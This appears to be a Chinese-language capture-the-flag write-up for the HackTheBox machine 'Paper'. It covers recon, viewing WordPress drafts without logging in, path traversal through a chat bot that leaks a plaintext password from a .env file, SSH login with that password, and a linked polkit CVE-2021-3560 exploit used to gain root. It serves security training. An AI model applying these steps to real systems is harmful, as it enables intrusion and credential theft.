目录

HackTheBox-Paper

https://app.hackthebox.com/machines/Paper

前期工作

nmap扫描结果

https://cdn.jsdelivr.net/gh/AMDyesIntelno/PicGoImg@master/202203261441238.png

https://cdn.jsdelivr.net/gh/AMDyesIntelno/PicGoImg@master/202203261441179.png

apache的测试页

https://cdn.jsdelivr.net/gh/AMDyesIntelno/PicGoImg@master/202203261451629.png

响应头里面有X-Backend-Server: office.paper

https://cdn.jsdelivr.net/gh/AMDyesIntelno/PicGoImg@master/202203261457737.png

10.10.11.143 office.paper加到/etc/hosts里面

https://cdn.jsdelivr.net/gh/AMDyesIntelno/PicGoImg@master/202203261458900.png

http://office.paper/index.php/2021/06/19/feeling-alone/

https://cdn.jsdelivr.net/gh/AMDyesIntelno/PicGoImg@master/202203261501159.png

wpscan扫描结果

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
[+] URL: http://office.paper/ [10.10.11.143]
[+] Started: Sat Mar 26 15:11:26 2022

Interesting Finding(s):

[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
 |  - X-Powered-By: PHP/7.2.24
 |  - X-Backend-Server: office.paper
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] WordPress readme found: http://office.paper/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05).
 | Found By: Rss Generator (Passive Detection)
 |  - http://office.paper/index.php/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>
 |  - http://office.paper/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.2.3</generator>

[+] WordPress theme in use: construction-techup
 | Location: http://office.paper/wp-content/themes/construction-techup/
 | Last Updated: 2021-07-17T00:00:00.000Z
 | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt
 | [!] The version is out of date, the latest version is 1.4
 | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1
 | Style Name: Construction Techup
 | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a...
 | Author: wptexture
 | Author URI: https://testerwp.com/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:04 <=========================================================================> (137 / 137) 100.00% Time: 00:00:04

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Mar 26 15:11:37 2022
[+] Requests Done: 185
[+] Cached Requests: 5
[+] Data Sent: 44.587 KB
[+] Data Received: 18.252 MB
[+] Memory used: 266.254 MB
[+] Elapsed time: 00:00:11

Unauthenticated View Private/Draft Posts

https://cdn.jsdelivr.net/gh/AMDyesIntelno/PicGoImg@master/202203261515217.png

http://office.paper/?static=1

https://cdn.jsdelivr.net/gh/AMDyesIntelno/PicGoImg@master/202203261517634.png

10.10.11.143 chat.office.paper加到/etc/hosts里面

获取user权限

聊天室里面有一个叫Recyclops的机器人,可以进行文件读取

https://cdn.jsdelivr.net/gh/AMDyesIntelno/PicGoImg@master/202203261523589.png

https://cdn.jsdelivr.net/gh/AMDyesIntelno/PicGoImg@master/202203261526615.png

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
root0:0:root:/root:/bin/bash
bin1:1:bin:/bin:/sbin/nologin
daemon2:2:daemon:/sbin:/sbin/nologin
adm3:4:adm:/var/adm:/sbin/nologin
lp4:7:lp:/var/spool/lpd:/sbin/nologin
sync5:0:sync:/sbin:/bin/sync
shutdown6:0:shutdown:/sbin:/sbin/shutdown
halt7:0:halt:/sbin:/sbin/halt
mail8:12:mail:/var/spool/mail:/sbin/nologin
operator11:0:operator:/root:/sbin/nologin
games12💯games:/usr/games:/sbin/nologin
ftp14:50:FTP User:/var/ftp:/sbin/nologin
nobody65534:65534:Kernel Overflow User:/:/sbin/nologin
dbus81:81:System message bus:/:/sbin/nologin
systemd-coredump999:997:systemd Core Dumper:/:/sbin/nologin
systemd-resolve193:193:systemd Resolver:/:/sbin/nologin
tss59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
polkitd998:996:User for polkitd:/:/sbin/nologin
geoclue997:994:User for geoclue:/var/lib/geoclue:/sbin/nologin
rtkit172:172:RealtimeKit:/proc:/sbin/nologin
qemu107:107:qemu user:/:/sbin/nologin
apache48:48:Apache:/usr/share/httpd:/sbin/nologin
cockpit-ws996:993:User for cockpit-ws:/:/sbin/nologin
pulse171:171:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
usbmuxd113:113:usbmuxd user:/:/sbin/nologin
unbound995:990:Unbound DNS resolver:/etc/unbound:/sbin/nologin
rpc32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
gluster994:989:GlusterFS daemons:/run/gluster:/sbin/nologin
chrony993:987::/var/lib/chrony:/sbin/nologin
libstoragemgmt992:986:daemon account for libstoragemgmt:/var/run/lsm:/sbin/nologin
saslauth991:76:Saslauthd user:/run/saslauthd:/sbin/nologin
dnsmasq985:985:Dnsmasq DHCP and DNS server:/var/lib/dnsmasq:/sbin/nologin
radvd75:75:radvd user:/:/sbin/nologin
clevis984:983:Clevis Decryption Framework unprivileged user:/var/cache/clevis:/sbin/nologin
pegasus66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
sssd983:981:User for sssd:/:/sbin/nologin
colord982:980:User for colord:/var/lib/colord:/sbin/nologin
rpcuser29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
setroubleshoot981:979::/var/lib/setroubleshoot:/sbin/nologin
pipewire980:978:PipeWire System Daemon:/var/run/pipewire:/sbin/nologin
gdm42:42::/var/lib/gdm:/sbin/nologin
gnome-initial-setup979:977::/run/gnome-initial-setup/:/sbin/nologin
insights978:976:Red Hat Insights:/var/lib/insights:/sbin/nologin
sshd74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
avahi70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
tcpdump72:72::/:/sbin/nologin
mysql27:27:MySQL Server:/var/lib/mysql:/sbin/nologin
nginx977:975:Nginx web server:/var/lib/nginx:/sbin/nologin
mongod976:974:mongod:/var/lib/mongo:/bin/false
rocketchat1001:1001::/home/rocketchat:/bin/bash
dwight1004:1004::/home/dwight:/bin/bash

尝试命令注入,发现机器人返回Stop injecting OS commands!

recyclops file ../bot_restart.sh

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/bin/bash

# Cleaning hubot's log so that it won't grow too large.
echo "" > /home/dwight/hubot/.hubot.log


# For starting the bot 20-ish (10+20) seconds late, when the server is restarted.
# This is because MongoDB and Rocket-Chat server needs some time to startup properly
sleep 10s

# Checks if Hubot is running every 10s
while [ 1 ]; 
do
sleep 20s
alive=$(/usr/sbin/ss -tulnp|grep 8000);
if  [[ -n $alive ]]; then
	err=$(grep -i 'unhandled-rejections=strict' /home/dwight/hubot/.hubot.log)
	if [[ -n $err ]]; then
		# Restarts bot
		echo "[-] Bot not running! `date`";
		#Killing the old process
		pid=$(ps aux|grep -i 'hubot -a rocketchat'|grep -v grep|cut -d " " -f6); 
		kill -9 $pid;
		cd /home/dwight/hubot;
		# Cleaning hubot's log so that it won't grow too large.
		echo "" > /home/dwight/hubot/.hubot.log
		bash /home/dwight/hubot/start_bot.sh&
	else


		echo "[+] Bot running succesfully! `date`";
	fi

	else
		# Restarts bot
		echo "[-] Bot not running! `date`";
		#Killing the old process
		pid=$(ps aux|grep -i 'hubot -a rocketchat'|grep -v grep|cut -d " " -f6); 
		kill -9 $pid;
		cd /home/dwight/hubot;
		bash /home/dwight/hubot/start_bot.sh&
	fi

done

recyclops file ../hubot/start_bot.sh

1
2
3
4
5
#!/bin/bash
cd /home/dwight/hubot
source /home/dwight/hubot/.env
/home/dwight/hubot/bin/hubot
#cd -

/home/dwight/hubot/.env

1
2
3
4
5
6
7
8
export ROCKETCHAT_URL='http://127.0.0.1:48320'
export ROCKETCHAT_USER=recyclops
export ROCKETCHAT_PASSWORD=Queenofblad3s!23
export ROCKETCHAT_USESSL=false
export RESPOND_TO_DM=true
export RESPOND_TO_EDITED=true
export PORT=8000
export BIND_ADDRESS=127.0.0.1

利用得到的密码成功登录ssh

https://cdn.jsdelivr.net/gh/AMDyesIntelno/PicGoImg@master/202203261559055.png

获取root权限

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
[+] [CVE-2021-4034] PwnKit

   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

CVE-2021-3560进行提权https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py

https://cdn.jsdelivr.net/gh/AMDyesIntelno/PicGoImg@master/202203261619036.png